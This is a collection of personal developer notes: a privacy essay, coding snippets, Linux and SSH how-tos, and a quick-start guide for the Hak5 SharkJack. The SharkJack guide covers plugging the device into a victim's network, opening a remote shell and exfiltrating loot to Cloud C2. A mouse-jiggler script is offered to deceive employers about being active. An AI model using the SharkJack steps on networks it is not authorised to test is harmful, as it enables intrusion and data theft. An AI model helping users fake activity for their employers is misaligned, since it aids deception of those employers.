Knowledge is power; Knowledge about you is power over you. Your information will be used to anticipate your actions and manipulate the way you shop, vote, and think. When you know you are being watched, you subconsciously change your behavior. Mass surveillance is an effective, means of fostering compliance with social norms or with social orthodoxy. Without privacy, you might be afraid of being judged by others, even if you're not doing anything wrong. It can be a heavy burden constantly having to wonder how everything we do will be perceived by others.

Data Can Be Used Against You

Your personal information and private communications can be "cherry-picked" to paint a certain one-sided picture. It can make you look like a bad person, or criminal, even if you are not. Data often results in people not being judged fairly- standards differ between cultures, organisations, and generations. Since data records are permanent, behavior that is deemed acceptable today, may be held against you tomorrow. Further to this, even things we don't think are worth hiding today, may later be used against us in unexpected ways.

Data Collection Has No Respect For Boundaries

Data collection has no respect for social boundaries, you may wish to prevent some people (such as employers, family or former partners) from knowing certain things about you. Once you share personal data, even with a party you trust, it is then out of your control forever, and at risk of being hacked, leaked or sold. An attack on our privacy, also hurts the privacy of those we communicate with.

Data Discriminates

When different pieces of your data is aggregated together, it can create a very complete picture of who you are. This data profile, is being used to influence decisions made about you: from insurance premiums, job prospects, bank loan eligibility and license decisions. It can determine whether we are investigated by the government, searched at the airport, or blocked from certain services. Even what content you see on the internet is affected by our personal data. This typically has a bigger impact on minority groups, who are unfairly judged the most. Without having the ability to know or control what, how, why and when our data is being used, we loose a level of control. One of the hallmarks of freedom is having autonomy and control over our lives, and we canโ€™t have that if so many important decisions about us are being made in the dark, without our awareness or participation.

The "I Have Nothing to Hide" Argument

Privacy isnโ€™t about hiding information; privacy is about protecting information, and everyone has information that theyโ€™d like to protect. Even with nothing to hide, you still put blinds on your window, locks on your door, and passwords on your email account.- Nobody would want their search history, bank statements, photos, notes or messages to be publicly available to the world.

Data Privacy needs to be for Everyone

For online privacy to be effective, it needs to be adopted my the masses, and not just the few. By exercising your right to privacy, you make it easier for others, such as activists and journalists, to do so without sticking out.


So What Should we Do?

  • Educate yourself about what's going on and why it matters
  • Be aware of changes to policies, revelations, recent data breaches and related news
  • Take steps to secure your online accounts and protect your devices
  • Understand how to communicate privately, and how use the internet anonymously
  • Use software and services that respect your privacy, and keep your data safe
  • Support organisations that fight for your privacy and internet freedom
  • Find a way to make your voice heard, and stand up for what you believe in

Thanks for reading :)

Recently I have been working on writing up a checklist of privacy and security tips, as well as a list of privacy-respecting software. Both are hosted on GitHub, so that anyone can contribute to it: https://github.com/Lissy93/personal-security-checklist

[HOW-TO] Remove all node_modules folders ๐Ÿ—‘๏ธ

Node Modules killing your hard drive space? Manually finding and removing is a pain, so here are some simple solutions

Option #1 - Natively

From your desired entry point, all you need to do, is run:

$ find . -name 'node_modules' -type d -prune -print -exec rm -rf '{}' \;

โš ๏ธ This will delete all nested node_modules directories, and their contents โš ๏ธ

If you'd first like to list of all node_modules within your current directory, you can run:

$ find . -name "node_modules" -type d -prune -print | xargs du -chs

This'll output the path, and total size of each occurrence of node_modules, and finish of by showing to cumulative total size


Option #1 - NPKill

NPKill is a simple, yet effective package that finds and removes all node_modules folders within your system.

After installing (with npm i -g npkill), just run npkill to start the CLI. From there you will be able to see all node_modules directories, along with their size and other meta data. You can then choose to delete them one-by-one, or all instances within certain parameters.

Gif: Searching for all node_modules Gif: Deleting selected, or all node_modules

Note for Windows users

The above options are for Unix systems (Linux/ MacOS), if you need to do this natively, try the following commands, (thanks to Sahil Malik).

View which folders will be deleted:

FOR /d /r . %d in (node_modules) DO @IF EXIST "%d" echo %d"

Initiate the Extermination:

FOR /d /r . %d in (node_modules) DO @IF EXIST "%d" rm -rf "%d"

Done ๐Ÿ˜€

keep-mouse-movin.sh ๐Ÿ–ฑ๏ธ

Working remotley? Sick and tired of having to get out of bed every 20 minutes to move your mouse, to prevent Slack/ Skype/ Teams from showing your status as Away? Well with a couple lines of bash, you can have your mouse pointer periodically move, ensureing your status will always remain Active. Your boss will be none the wiser

# LENGTH is the amount of px the mouse will move
# 0 = not moving at all, 1 = tiny movement, 100 = giant movement
LENGTH=50

# DELAY is the time period between movements, in seconds
DELAY=5

while true
  do
    for ANGLE in 0 90 180 270
      do
        xdotool mousemove_relative --polar $ANGLE $LENGTH
          sleep $DELAY
      done
    done

The pointer will move around its current position on the screen (i.e where you last placed it). However, if you prefer it to move around the centre of the screen, just change mousemove_relative to mousemove in the xdotool command.

[HOW-TO] Compile & Install Software on Arch ๐Ÿ—๏ธ

Quick reference of the common commands, to install packages on Arch Linux

Option #1 - Pacman

If the app is availible through AUR, then you can simply use the pacman package manager

## Install
$ sudo pacman -S {package-name(s)}

## Get Details
$ pacman -Qi {package-name}

## Remove
$ sudo pacman -R {package-name}

Option #2 - Manually

Using the makepkg script to build the package from source

## 1. Get the code (E.g. from AUR, GitHub)
$ wget https://aur.archlinux.org/packages/{package-name}.tar.gz
$ tar -xvzf  {package-name}.tar.gz
$ cd {package-name}

## 2. Compile the package
$ makepkg -s

## 3. Install the app
$ sudo pacman -U *xz

Option #2 - from .deb

If only a .deb file is availible, you can convert it using debtap

## 1. Get debtap (first time), and optionally create an alias
$ git clone https://github.com/helixarch/debtap
$ alias debtap='. .path/to/debtap'

## 1. Download the .deb package you wish to install, e.g.
$ git clone {url-to-package.git}
$ cd {package-name}


## 3. Convert .deb to Arch package
$ debtap packagetoconvert.deb

## 4. Install the converted package to system
$ debtap -U *

Usefull Info:

key-mirror.ts ๐Ÿชž

A quick function to construct an enumeration which has keys the same as their value

This used to be part of React, but since it's now been removed (See commit: #56f5115), and some older packages throw an error without it, I've updated it, and uploading in case anyone else needs it while working with older React packages. A copy of React's original, JavaScript version can be found here.

/**
 * (C) Alicia Sykes <https://aliciasykes.com>
 * Licensed under MIT X11: https://git.io/Jew4i
 *
 * Constructs an enumeration with keys equal to their value.
 * @param {object} obj
 * @return {object}
 */
export function keyMirror(originObj: object) {
  if (typeof originObj !== 'object')
    throw new Error('keMirror(...): Argument must be an object');
  const obj: any = {};
  for (const key in originObj) {
    if (originObj.hasOwnProperty(key)) obj[key] = key;
  }
  return obj
}

React Grid System โš›๏ธ


/*
 * This is a little grid system I built, for React projects.
 * It is based on the css-grid prroperties, and it's cool because 
 * it doesn't need any dependencies and is super minimal, yet still fully functional.
 * This implementation is a React component, in TypeScript using styled-components.
 */

// FILE 1 - layout/index.ts

import Grid from './Grid';
import Cell from './Cell';

export { Grid, Cell };

// FILE 2 - layout/cell.ts

import styled from 'styled-components';
import { maxWidth } from '@styles/media-queries';

interface CellProps {
  left?: number; // The horizontal starting position
  width?: number; // How many cells to span, horizontally
  top?: number; // The vertical starting position
  height?: number; // How many cells to span, vertically
  className?: string; // So Cell can optionally be used as a styled container
}

const Cell = styled.div<CellProps>`
  ${props => {
    const { left, width, top, height } = props;
    return `
    grid-column-start: ${left || 'unset'};
    grid-column-end: ${width ? `span ${width}` : 'unset'};
    grid-row-start: ${top || 'unset'};
    grid-row-end: ${height ? `span ${height}` : 'unset'};
    overflow-x: hidden;
    overflow-wrap: break-word;
    word-wrap: break-word;
    ${maxWidth.tablet(`
      // For tablet and above
      grid-column-start: unset;
      grid-row-start: unset; 
    `)};
  `;
  }}
`;

export default Cell;



// FILE 3 - layout/grid.ts

import React from 'react';
import styled from 'styled-components';
import { gridValues } from '@styles/sizes';
import { minWidth } from '@styles/media-queries';

const GridWrapper = styled.div<{ columns?: number; gutterOutside?: boolean }>`
  ${({ columns, gutterOutside }) => {
    const { maxGridWidth, gutter, minRowHeight, minColWidth, numCols } = gridValues(columns);

    const desktop = gridValues(columns, 8, 4);

    return `
      max-width: ${maxGridWidth};
      margin: 0 auto;
      display: grid;
      grid-gap: ${gutter};
      padding: 0 ${gutterOutside ? gutter : 0}
      grid-auto-rows: minmax(${minRowHeight}, auto);
      grid-template-columns: repeat(auto-fit, minmax(${minColWidth}, 1fr));

      // For tablet and above
      ${minWidth.tablet(`
        grid-template-columns: repeat(${numCols}, 1fr);
      `)};

      // For desktop and above
      ${minWidth.desktop(`
        max-width: ${desktop.maxGridWidth};
        grid-gap: ${desktop.gutter};
      `)}
    `;
  }}
`;

const Grid: React.FC<{ className?: string; columns?: number; gutterOutside?: boolean }> = ({
  className,
  columns,
  children,
  gutterOutside,
}) => (
  <GridWrapper className={className} columns={columns} gutterOutside={gutterOutside}>
    {children}
  </GridWrapper>
);

export default Grid;

// FILE 4 - layout/grid-dimensions.ts

expoert const gridValues = (columns = 12, colWidth = 8, gutterWidth = 2) => ({
  maxGridWidth: sizeUnit(columns * colWidth + (columns - 1) * gutterWidth),
  gutter: sizeUnit(gutterWidth),
  minRowHeight: sizeUnit(5),
  minColWidth: sizeUnit(colWidth),
  numCols: columns,
});

Fave YouTube Chanels ๐Ÿ“ผ

๐Ÿ”จ Hardware/ Electronics/ DIY

๐Ÿ” Cyber Security/ Hacking

๐Ÿ’ฟ Linux / Servers

๐Ÿงฎ Coding/ Algorithms/ Math

๐Ÿ’ป Technology/ PCs/ Consumer Electronics

๐Ÿ›ฐ Astronomy

๐Ÿ“บ Cartoons

โœ Bible

๐Ÿš… Trains

๐Ÿงช Science/ Engineering

๐Ÿƒโ€โ™‚๏ธ Motivational/ Lifestyle

๐Ÿ‘พ Fun/ Sometimes Educational

โšฐ Past Legends/ Rarely Updated

๐ŸŒŸ Personal Favorite Favorites

Notes

These are my personal favorite YouTube channels, the talent and hard work behind each of these channels is very inspirational. Since I can't feasibly financially support all of them, I am instead sharing there content here.

I try to avoid using the official YouTube app and website (due to privacy concerns) (I instead use Invidious (web) / FreeTube (desktop) / NewPipe (mobile)). Therefore I need to manage my subscriptions externally, and that is part of what this list is for.

[HOW-TO] Use SSH for Server Authentication ๐Ÿ”“

Option #1 - Manual Configuration

Generating a new SSH Key Pair

  1. Run ssh-keygen -t rsa -b 4096
  2. When prompted, enter a passphrase
  3. SSH keys should be stored in ~/.ssh/

Importing Public Key to Remote Machine

  1. SSH into remote server, with username + password
  2. cd into your /home directory, and mkdir .ssh
  3. Copy public key from local to remote machine scp ~/.ssh/my_key.pub user@0.0.0.0:/home/username/.ssh/my_key.pub
  4. Append SSH public key to authorized hosts file cat ~/.ssh/my_key.pub >> ~/.ssh/authorized_keys
  5. Set permissions to .ssh directory (read, write, execute) and files (read, write) chmod 700 ~/.ssh/ && chmod 600 ~/.ssh/*

Disable Password Authentication

  1. Make a backup of the sshdconfig file, before modifying it `sudo cp /etc/ssh/sshdconfig.backup`
  2. Turn off password authentication
    • sudo vim /etc/ssh/sshd_config
    • Find #PasswordAuthentication yes and replace with PasswordAuthentication no
    • Save and exit
  3. Restart SSH service sudo service ssh restart

Option #2 - SSH Copy ID Command

After generating an SSH key pair, simple run ssh-copy-id user@0.0.0.0
This adds your public key to the .ssh/authorized_keys file on the remote server

Further Links

[HOW-TO] Operate the SharkJack ๐Ÿฆˆ

A Quick-Start Guide for the Hak5 SharkJack, a portable network attack tool

Access the SharkJack

  1. Switch to Arming Mode (center), and connect to PC via Ethernet
  2. Find the IP: Default is 172.16.24.1, run ifconfig to check
  3. Login: ssh root@172.16.24.1, using password hak5shark
  4. On first setup, change the default password, run passwd

Navigating the SharkJack

  • The active payload is located at: ~/payload/payload.sh
  • Captured loot is stored with the ~/loot/... directory
  • To save all loot locally, run: scp -r root@172.16.24.1:/root/loot/* .
  • To upload a new payload, run scp payload.sh root@172.16.24.1:/root/payload/

Conducting an Attack

  1. Flip into Attack Mode (fully forward), and wait for LED to go magenta
  2. Plug device into victim Ethernet port, watch LED's blink
  3. Once LED turns off, unplug device and switch to off

Out-of-the box, the ShakJack comes with an nmap payload, useful for initial network reconnaissance

Additional Tools

CLI Helper Tool

The SharkJack Helper a CLI tool for carrying out common tasks:
Get a shell, push a payload, grab saved loot and upgrade the firmware etc

  1. Download from: https://downloads.hak5.org/shark
  2. Make executable: chmod +x sharkjack.sh
  3. Run ./sharkjack.sh, and follow on-screen prompts

Web Interface

Once the firmware has been updated (V1.01 and newer), you can access the SharkJack's web interface by visiting 172.16.24.1 in your browser. From here you can view and modify the current payload, download your loot and view device status

Cloud C2

  1. Download and run Cloud C2 for your system, from https://shop.hak5.org/products/c2
  2. Go to Add Device --> SharkJack. Then select the listing --> Setup, and config file will download
  3. The device.config needs to be uploaded to /etc. Run scp device.config root@172.16.24.1:/ete/
  4. To connect, run CTCONNECT. Back on the web interface, your now able to open a shell, for remote access!
  5. To get the loot, run C2EFIL STRING /root/loot/nmap/nmap-scan_1.txt nmap, data now will show up in Loot tab!

Note that it the SharkJack does not connect to CloudC2 automatically, but by using the CTCONNECT and C2EFIL .. commands to your payload, you'll be able to exfiltrate the loot immediately, and access it remotely.

Reference Info

Switch Positions

  • Back: Off/ Charging
  • Middle: Arming Mode
  • Front: Attack Mode

LET Lights

  • Green (blinking): Booting up
  • Blue (blinking): Charging
  • Blue (solid): Fully Charged
  • Yellow (blinking): Arming Mode
  • Red (blinking): Error / No Payload

Individual Payloads have their own LED routines, but usually:
Red: Setup, Amber: Scanning, Green: Finished

Specifications

  • OS: OpenWRT 19.07-based GNU/Linux
  • SoC: 580MHz MediaTek MT7628DAN mips CPU
  • MEMORY: 64 MB DDR2 RAM, 64 MB SPI Flash
  • IO: RJ45 IEEE 802.3 Ethernet + USB-C charge port
  • DIMENSIONS: 62 x 21 x 12 mm
  • POWER: 2.5W (USB 5V 0.5A)
  • BATTERY: 1S 401020 3.7V 50mAh 0.2W LiPo
  • BATTERY TIMES: ~15 mins run, ~7 mins charge
  • TEMP: Operating- 35ยบC ~ 45ยบC, Storage -20ยบC ~ 50ยบC
  • RELATIVE HUMIDITY: 0% to 90% (noncondensing)